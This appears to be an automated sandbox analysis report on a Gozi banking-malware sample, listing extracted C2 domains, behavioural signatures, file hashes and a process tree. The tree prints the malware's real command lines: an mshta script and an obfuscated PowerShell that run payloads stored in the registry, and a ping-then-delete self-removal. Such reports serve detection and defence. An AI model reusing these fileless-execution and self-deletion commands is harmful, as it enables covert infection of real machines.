Analysis
-
max time kernel
150s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
05-10-2023 10:04
Static task
static1
Behavioral task
behavioral1
Sample
client.exe
Resource
win7-20230831-en
General
-
Target
client.exe
-
Size
304KB
-
MD5
27b1d878636e00e43436184b70e9f41c
-
SHA1
b175d86922e1e837d8d74b588ff746ea7b8670df
-
SHA256
fe05e50be407f5efcb1870991f86ec721fd7088e92782a60aa815e0a68eb486e
-
SHA512
086b34070946d275ef50552969c6e561349299eb7eece513ca4504c84ad7810a02428a1540ecd715541139f500137209c94297a331dfa87c18afa2d91e24349e
-
SSDEEP
6144:R+91vEOpa6NK56upTHirwtRinshvjxdyhgAw8Fi5r+IxsN+:8Dsf4K56u1HqLshvjxia8Mr+/
Malware Config
Extracted
gozi
Extracted
gozi
5050
mifrutty.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
mifrutty.com
systemcheck.top
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral1/memory/2084-0-0x0000000000100000-0x000000000010C000-memory.dmp dave -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1296 cmd.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 1128 set thread context of 1192 1128 powershell.exe Explorer.EXE PID 1192 set thread context of 1296 1192 Explorer.EXE cmd.exe PID 1296 set thread context of 1148 1296 cmd.exe PING.EXE PID 1192 set thread context of 2576 1192 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 1148 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
client.exepowershell.exeExplorer.EXEpid process 2084 client.exe 1128 powershell.exe 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1192 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 1128 powershell.exe 1192 Explorer.EXE 1296 cmd.exe 1192 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1128 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 1192 Explorer.EXE -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 2024 wrote to memory of 1128 2024 mshta.exe powershell.exe PID 2024 wrote to memory of 1128 2024 mshta.exe powershell.exe PID 2024 wrote to memory of 1128 2024 mshta.exe powershell.exe PID 1128 wrote to memory of 1824 1128 powershell.exe csc.exe PID 1128 wrote to memory of 1824 1128 powershell.exe csc.exe PID 1128 wrote to memory of 1824 1128 powershell.exe csc.exe PID 1824 wrote to memory of 744 1824 csc.exe cvtres.exe PID 1824 wrote to memory of 744 1824 csc.exe cvtres.exe PID 1824 wrote to memory of 744 1824 csc.exe cvtres.exe PID 1128 wrote to memory of 2788 1128 powershell.exe csc.exe PID 1128 wrote to memory of 2788 1128 powershell.exe csc.exe PID 1128 wrote to memory of 2788 1128 powershell.exe csc.exe PID 2788 wrote to memory of 1248 2788 csc.exe cvtres.exe PID 2788 wrote to memory of 1248 2788 csc.exe cvtres.exe PID 2788 wrote to memory of 1248 2788 csc.exe cvtres.exe PID 1128 wrote to memory of 1192 1128 powershell.exe Explorer.EXE PID 1128 wrote to memory of 1192 1128 powershell.exe Explorer.EXE PID 1128 wrote to memory of 1192 1128 powershell.exe Explorer.EXE PID 1192 wrote to memory of 1296 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 1296 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 1296 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 1296 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 1296 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 1296 1192 Explorer.EXE cmd.exe PID 1296 wrote to memory of 1148 1296 cmd.exe PING.EXE PID 1296 wrote to memory of 1148 1296 cmd.exe PING.EXE PID 1296 wrote to memory of 1148 1296 cmd.exe PING.EXE PID 1296 wrote to memory of 1148 1296 cmd.exe PING.EXE PID 1296 wrote to memory of 1148 1296 cmd.exe PING.EXE PID 1296 wrote to memory of 1148 1296 cmd.exe PING.EXE PID 1192 wrote to memory of 2576 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 2576 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 2576 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 2576 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 2576 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 2576 1192 Explorer.EXE cmd.exe PID 1192 wrote to memory of 2576 1192 Explorer.EXE cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Users\Admin\AppData\Local\Temp\client.exe"C:\Users\Admin\AppData\Local\Temp\client.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2084 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bat1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bat1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3C64491B-6BF2-CEE4-D530-CFE2D9647336\\\MusicWhite'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name hnouomb -value gp; new-alias -name okdfsimvoc -value iex; okdfsimvoc ([System.Text.Encoding]::ASCII.GetString((hnouomb "HKCU:Software\AppDataLow\Software\Microsoft\3C64491B-6BF2-CEE4-D530-CFE2D9647336").ControlText))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q-jz-g0e.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2C20.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2C10.tmp"5⤵PID:744
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ezf6vonx.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CAD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2CAC.tmp"5⤵PID:1248
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1148 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:2576
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES2C20.tmpFilesize
1KB
MD5e3eaff0ff446a82420a055338bd63cf5
SHA1279541fc2a66898a32e5fcfd31e2b4157f0c4f2c
SHA256c068629b23890ec42e09dc9803462094a68f28189d183d6b86276bf154604d03
SHA5122401f053efa732a538734e50f580b0105ecee2d99bf504399f73c79f73e5c96bc7ba845ed00789d497fb0e6c8338728e44cc6b8412a9b35e19059b7df672d1f5
-
C:\Users\Admin\AppData\Local\Temp\RES2CAD.tmpFilesize
1KB
MD5fc827bea931f369fbcb9a00dcaa63c82
SHA14d4366ed2b8ca0cb9c6ee8731811db3fd5d5055d
SHA256488f4d9b2e1c89ae4b61fb005d6435e233b9592fd19b63f23e4cbf0f9399bef7
SHA51299b54c18311a5eb5ca9460580302a8e5266b0387f05d9120db08194f254c109c4c2d29df77d9a5d730fd396e8b8f26f69777880977e3da83cac104237c7e7a29
-
C:\Users\Admin\AppData\Local\Temp\ezf6vonx.dllFilesize
3KB
MD5c4b697214905956caa633e6cf9d05f3a
SHA109d823442633a17d50c09f435fba2ca978c11f0b
SHA2566b484ccad3b77a6763e22a5e32e688f1cf744d56a2c19fcf79fcde9124013fe3
SHA512764d5f8d8b009a53cc2dbc43235e52791ef75f6bc7f31a2e74dee3f3121871841214e1ac1a71926195b3aee0cf9fb169bbc76435c010af62711ee55b0a6aa161
-
C:\Users\Admin\AppData\Local\Temp\ezf6vonx.pdbFilesize
7KB
MD5da789a2a26b0a117f4d3dbef06097a2a
SHA10c7553470afcf608e495db6031966d9526d3d86a
SHA25677f9ebf711ff2142edd485a6798d1616dd296892a8d21402df27b143c1e8a6b6
SHA51220fe32a9bd3c5872200832fcde845f3af47467f78f413a743276a0c40b042db8af559eeb1def50cf8aa3ce3640d72279d46e1080bdd431c89b7c2b21f35e06ea
-
C:\Users\Admin\AppData\Local\Temp\q-jz-g0e.dllFilesize
3KB
MD559192b3243170490fc96d7b25129e3a0
SHA1bcc2f5c28978eaf7d9cd02ad1c00e749190181bc
SHA256b4f918ae7d8457a95c0eb2f184bf0ad7c8d1d9447b35b4e14deba7c136f77fd4
SHA512b9873cefb4d2019f86c79a1ebf5ea853309a755c925e45e5ea8b27cd8fc701fd73129f8bb6c73c61093cde8674e855ee470b7aa583da6393ab5a3c76d721d799
-
C:\Users\Admin\AppData\Local\Temp\q-jz-g0e.pdbFilesize
7KB
MD57346e21009d7d8a2a2bf35e44543b0eb
SHA18eca369949752d636574365591fc85dae7e9d7d2
SHA2566d7cfc7d01fc4c59cebbaf542b70f115da0e46c14604c812f82acdd7f26f0941
SHA512dcb32326efeaa0a3c5fd5f5fc3002527540d89504e005e4a84f09f6d713348c6c7d85c45aa59284d05bd50791758fc796f50dccd5e113dcd4b032260b760b4d0
-
\??\c:\Users\Admin\AppData\Local\Temp\CSC2C10.tmpFilesize
652B
MD5d68fe77c49942b7099ec44b7da531aa4
SHA1964f04da7ff79e84f90b0ef5557d7a93159203f7
SHA25627985032a8194490ed5b39f3253620602b8d2ce097cac5a9259e7e7caf18c972
SHA51212c4806e5ab54335e7a38be28645eaa614967a82876b83c57876a4f86e73f208ba5f86b943eb9ad9c5ef53daf702abf36535a285280cdecf74e320a1624fd5e1
-
\??\c:\Users\Admin\AppData\Local\Temp\CSC2CAC.tmpFilesize
652B
MD546401ca99542585019f9cfb18ee6d7dc
SHA1827197da7d8987100d6a3bd70afa449481489597
SHA2562c38f1310bc6161bf0975be52e92341ee66273ab5a14dcde88cece39ec30ed53
SHA5129d5c5a9b0d4555a4a45b1038e6c9b17946296b971e8cfcbf3d9284d58ad10426339d8d4e3bf523636d881d90655a32c51762020bf5d845695019cec1288c75fb
-
\??\c:\Users\Admin\AppData\Local\Temp\ezf6vonx.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\ezf6vonx.cmdlineFilesize
309B
MD598c844338e4eb2dba16ebc6ea63b50b3
SHA1516a363178076019a0541942509fbbbf797c36e1
SHA2561b3d1b8dd3e3f2aa330c472a62b8b4193d1cbf1a1677f2430c7cdaa092cb24b5
SHA512315f5f01564affac53d7acf87c72e09f4f4fac0cc4ac656f77818d47ddeff8d0ee5c2589c70269c606aa06363700469bef5fd0f99be4bad6fea5fc83dd8c9f6b
-
\??\c:\Users\Admin\AppData\Local\Temp\q-jz-g0e.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\q-jz-g0e.cmdlineFilesize
309B
MD5d045ad73eb545d1891baaff3e545d5b0
SHA10fbf1740f1041af78a544eef9d4aad95d5787920
SHA25638ef44ce5c7b6830d102e93c4024b78c9b31f5a49de64f5eae0572e7ec4af295
SHA512ff551387a4c0e10a15e5d7918f7c9f18cf5b3619b9d63a64bdd13aa36ae449ec55df6f602b2041f517e621e5d5b6b6e7b082557771c15ea8623f0fe437cc019f
-
memory/1128-25-0x000007FEF57F0000-0x000007FEF618D000-memory.dmpFilesize
9.6MB
-
memory/1128-19-0x000000001B390000-0x000000001B672000-memory.dmpFilesize
2.9MB
-
memory/1128-24-0x00000000029E0000-0x0000000002A60000-memory.dmpFilesize
512KB
-
memory/1128-23-0x00000000029E0000-0x0000000002A60000-memory.dmpFilesize
512KB
-
memory/1128-22-0x00000000029E0000-0x0000000002A60000-memory.dmpFilesize
512KB
-
memory/1128-39-0x00000000028A0000-0x00000000028A8000-memory.dmpFilesize
32KB
-
memory/1128-21-0x000007FEF57F0000-0x000007FEF618D000-memory.dmpFilesize
9.6MB
-
memory/1128-20-0x0000000001FC0000-0x0000000001FC8000-memory.dmpFilesize
32KB
-
memory/1128-69-0x000007FEF57F0000-0x000007FEF618D000-memory.dmpFilesize
9.6MB
-
memory/1128-70-0x00000000028D0000-0x000000000290D000-memory.dmpFilesize
244KB
-
memory/1128-59-0x00000000028D0000-0x000000000290D000-memory.dmpFilesize
244KB
-
memory/1128-56-0x00000000028B0000-0x00000000028B8000-memory.dmpFilesize
32KB
-
memory/1148-78-0x0000000001B60000-0x0000000001C04000-memory.dmpFilesize
656KB
-
memory/1148-79-0x0000000000090000-0x0000000000091000-memory.dmpFilesize
4KB
-
memory/1148-77-0x000007FFFFFD7000-0x000007FFFFFD8000-memory.dmpFilesize
4KB
-
memory/1148-89-0x0000000001B60000-0x0000000001C04000-memory.dmpFilesize
656KB
-
memory/1192-88-0x0000000003C20000-0x0000000003CC4000-memory.dmpFilesize
656KB
-
memory/1192-61-0x00000000026E0000-0x00000000026E1000-memory.dmpFilesize
4KB
-
memory/1192-60-0x0000000003C20000-0x0000000003CC4000-memory.dmpFilesize
656KB
-
memory/1296-72-0x0000000000380000-0x0000000000424000-memory.dmpFilesize
656KB
-
memory/1296-71-0x000007FFFFFD9000-0x000007FFFFFDA000-memory.dmpFilesize
4KB
-
memory/1296-73-0x0000000000110000-0x0000000000111000-memory.dmpFilesize
4KB
-
memory/1296-90-0x0000000000380000-0x0000000000424000-memory.dmpFilesize
656KB
-
memory/2084-1-0x0000000000190000-0x000000000019F000-memory.dmpFilesize
60KB
-
memory/2084-0-0x0000000000100000-0x000000000010C000-memory.dmpFilesize
48KB
-
memory/2084-5-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/2084-11-0x00000000001C0000-0x00000000001CD000-memory.dmpFilesize
52KB
-
memory/2084-14-0x0000000000480000-0x0000000000482000-memory.dmpFilesize
8KB
-
memory/2576-84-0x0000000000300000-0x0000000000301000-memory.dmpFilesize
4KB
-
memory/2576-83-0x0000000000420000-0x00000000004B8000-memory.dmpFilesize
608KB
-
memory/2576-87-0x0000000000420000-0x00000000004B8000-memory.dmpFilesize
608KB
-
memory/2788-47-0x0000000001EA0000-0x0000000001F20000-memory.dmpFilesize
512KB